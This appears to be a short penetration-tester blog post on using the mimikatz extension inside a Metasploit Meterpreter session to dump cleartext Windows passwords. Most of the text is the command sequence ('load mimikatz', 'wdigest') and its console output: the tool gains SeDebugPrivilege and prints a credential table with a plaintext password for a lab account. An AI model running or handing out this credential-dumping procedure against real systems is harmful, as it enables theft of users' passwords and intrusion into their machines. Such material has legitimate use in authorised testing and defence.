Finally, mimikatz has been accepted into the Metasploit trunk! This post is an update to an earlier post named Dumping Clear Text Passwords. Now, it’s easier than ever to dump clear text passwords from within a Meterpreter session. Let’s walk through an example.
At the time of this writing, “msfupdate” was not pulling down the mimikatz extension for me, so I just copied the required files to their respective locations found here. Now, once we attain a Meterpreter session, we just load the extension and call “wdigest”.
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;999     NTLM       WORKGROUP     VULNXP$
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;49975   NTLM
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE
0;173813  NTLM       VULNXP        TrustedSec       SecurityMadeSimple!
Easy as pie. I can’t wait to use this on our next pentest!